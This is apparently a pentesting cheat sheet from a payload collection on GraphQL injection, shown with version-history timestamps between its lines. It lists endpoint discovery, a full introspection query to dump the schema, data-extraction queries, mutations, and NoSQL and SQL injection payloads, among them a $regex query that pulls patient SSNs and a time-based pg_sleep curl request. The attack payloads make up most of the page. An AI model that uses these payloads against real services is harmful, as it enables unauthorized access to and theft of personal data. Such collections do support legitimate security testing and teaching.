2019-03-06 12:18:54 +00:00
# GraphQL injection
2019-07-01 21:29:29 +00:00
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
2019-03-06 12:18:54 +00:00
2019-06-21 15:01:43 +00:00
## Summary
* [Tools ](#tools )
* [Exploit ](#exploit )
* [Identify an injection point ](#identify-an-injection-point )
* [Enumerate Database Schema via Instropection ](#enumerate-database-schema-via-introspection )
* [Extract data ](#extract-data )
2019-07-05 19:34:04 +00:00
* [Extract data using edges/nodes ](#extract-data-using-edges-nodes )
* [Extract data using projections ](#extract-data-using-projections )
2019-06-21 15:01:43 +00:00
* [Enumerate the types' definition ](#enumerate-the-type-definition )
* [Use mutations ](#use-mutations )
* [NOSQL injection ](#nosql-injection )
* [SQL injection ](#sql-injection )
* [References ](#references )
## Tools
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes ](https://github.com/swisskyrepo/GraphQLmap )
* [GraphQL Security Toolkit - GraphQL Security Research Material ](https://github.com/doyensec/graph-ql/ )
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's ](https://github.com/andev-software/graphql-ide )
2019-03-06 12:18:54 +00:00
## Exploit
2019-06-09 11:46:40 +00:00
### Identify an injection point
2019-03-06 12:18:54 +00:00
2019-06-21 15:01:43 +00:00
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
2019-06-09 11:46:40 +00:00
```js
example.com/graphql?query={__schema{types{name}}}
2019-07-01 21:29:29 +00:00
example.com/graphiql?query={__schema{types{name}}}
2019-03-06 12:18:54 +00:00
```
2019-06-21 15:01:43 +00:00
Check if errors are visible.
2019-03-06 12:18:54 +00:00
2019-04-21 17:50:50 +00:00
```javascript
2019-06-21 15:01:43 +00:00
?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}
2019-03-06 12:18:54 +00:00
```
2019-06-21 15:01:43 +00:00
### Enumerate Database Schema via Introspection
URL encoded query to dump the database schema.
2019-06-09 11:46:40 +00:00
```js
2019-06-21 15:01:43 +00:00
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
2019-06-09 11:46:40 +00:00
```
2019-06-21 15:01:43 +00:00
URL decoded query to dump the database schema.
2019-03-06 12:18:54 +00:00
2019-04-21 17:50:50 +00:00
```javascript
2019-03-06 12:18:54 +00:00
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
```
2019-06-21 15:01:43 +00:00
### Extract data
```js
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
```
![HTB Help - GraphQL injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true )
2019-07-05 19:34:04 +00:00
### Extract data using edges/nodes
```json
{
"query": "query {
teams{
total_count,edges{
node{
id,_id,about,handle,state
}
}
}
}"
}
```
### Extract data using projections
:warning: Don’ t forget to escape the " inside the **options** .
```json
{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
```
2019-06-21 15:01:43 +00:00
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
2019-03-06 12:18:54 +00:00
2019-04-21 17:50:50 +00:00
```javascript
2019-03-06 12:18:54 +00:00
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
2019-06-21 15:01:43 +00:00
### Use mutations
Mutations work like function, you can use them to interact with the GraphQL.
```javascript
# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
```
### NOSQL injection
Use `$regex` , `$ne` from []() inside a `search` parameter.
```json
{
doctors(
options: "{\"limit\": 1, \"patients.ssn\" :1}",
search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
{
firstName lastName id patients{ssn}
}
}
```
### SQL injection
2019-12-11 15:59:14 +00:00
Send a single inside a graphql parameter to trigger the SQL injection
```powershell
{
bacon(id: "1'") {
id,
type,
price
}
}
```
2019-06-21 15:01:43 +00:00
Simple SQL injection inside a graphql field.
```powershell
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
```
2019-03-06 12:18:54 +00:00
## References
* [Introduction to GraphQL ](https://graphql.org/learn/ )
* [GraphQL Introspection ](https://graphql.org/learn/introspection/ )
2019-06-09 11:46:40 +00:00
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019 ](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2 )
2019-06-21 15:01:43 +00:00
* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify ](https://labs.detectify.com/2018/03/14/graphql-abuse/ )
* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren ](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e )
* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber ](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b )
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey ](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/ )
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert ](https://hackerone.com/reports/435066 )
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r ](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/ )
2019-06-23 22:21:39 +00:00
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado ](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/ )
* [GraphQL cheatsheet - DEVHINTS.IO ](https://devhints.io/graphql )
2019-07-05 19:34:04 +00:00
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky ](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/ )
2019-09-02 10:36:40 +00:00
* [Introspection query leaks sensitive graphql system information - @Zuriel ](https://hackerone.com/reports/291531 )
* [Graphql Bug to Steal Anyone’ s Address - Sept 1, 2019 - Pratik Yadav ](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417 )